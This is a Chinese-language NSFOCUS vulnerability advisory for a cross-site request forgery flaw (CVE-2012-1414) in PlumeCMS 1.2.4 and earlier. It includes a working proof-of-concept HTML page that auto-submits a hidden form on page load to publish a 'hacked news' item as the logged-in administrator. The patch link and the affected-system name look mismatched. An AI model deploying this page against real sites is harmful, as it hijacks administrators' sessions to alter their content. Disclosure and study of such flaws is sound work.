安全研究

安全漏洞
PlumeCMS <= 1.2.4跨站请求伪造漏洞

发布日期:2012-10-07
更新日期:2012-10-08

受影响系统:
sourceforge pxsystem < 1.2.4
描述:
CVE ID: CVE-2012-1414

Plume CMS是简单易用的内容管理系统,可在所有主要平台上通过简单的脚本进行安装。

Plume CMS 1.2.4及更早版本的manager/news.php存在跨站请求伪造漏洞,可通过发布操作,允许远程攻击者劫持管理员请求新建页面的身份验证请求。

<*来源:Ivano Binetti
  
  链接:http://www.exploit-db.com/exploits/18502/
        http://osvdb.org/show/osvdb/80807
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Exploit

<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to add and publish News</H2>
<form method="POST" name="form0" action="http://localhost:80/plume/manager/news.php">
<input type="hidden" name="n_category_id" value="1"/>
<input type="hidden" name="n_content_format" value="html"/>
<input type="hidden" name="n_status" value="1"/>
<input type="hidden" name="n_comment_support" value="1"/>
<input type="hidden" name="n_subtype" value="2"/>
<input type="hidden" name="n_title" value="hacked news"/>
<input type="hidden" name="n_content" value="%3Cp%3Etest2%3C%2Fp%3E"/>
<input type="hidden" name="n_subject" value=""/>
<input type="hidden" name="n_titlewebsite" value=""/>
<input type="hidden" name="n_linkwebsite" value=""/>
<input type="hidden" name="publish" value="Save+%5Bs%5D"/>
</form>
</body>
</html>

建议:
厂商补丁:

sourceforge
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://jocr.sourceforge.net/index.html

浏览次数:2221
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障